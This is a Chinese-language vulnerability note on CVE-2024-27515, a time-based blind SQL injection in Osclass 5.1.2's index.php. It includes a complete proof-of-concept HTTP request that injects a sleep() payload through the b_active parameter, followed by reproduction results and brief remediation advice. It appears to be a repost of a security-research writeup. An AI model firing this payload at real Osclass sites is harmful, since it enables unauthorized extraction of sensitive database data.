免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
Osclass 5.1.2 index.php sql注入漏洞
02
—
漏洞影响
Osclass 5.1.2
Osclass是一个开源项目,地址如下,但start不多,感兴趣的自行搭建靶场
https://github.com/mindstellar/Osclass
03
—
漏洞描述
Osclass是一个免费的和开源的脚本,用来创建您的广告或列表网站。最佳功能:插件,主题,多语言,验证码,仪表板,SEO友好。Osclass 5.1.2版本中index.php接口处存在一个SQL注入漏洞,未授权的攻击者可以利用漏洞获取敏感数据。
04
—
漏洞复现
POC数据包如下,让执行sleep(4)
GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items®ion=NY®ionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123 HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=b44r3de2iae3vmvm8at026v7vu; 54f78354eccc6e15622d3aaeccf02ca2=oc_adminId._.oc_adminSecret._.oc_adminLocale._.listing_iDisplayLength%261._.v5qMg6iJ._.en_US._.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive
确实延时4秒
再执行sleep(10),让睡眠10秒
响应时间超过10秒
漏洞复现成功
05
—
修复建议
开源项目,目前没有补丁,自行修改源码或者部署waf防护。
原文始发于微信公众号(AI与网安):CVE-2024-27515
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论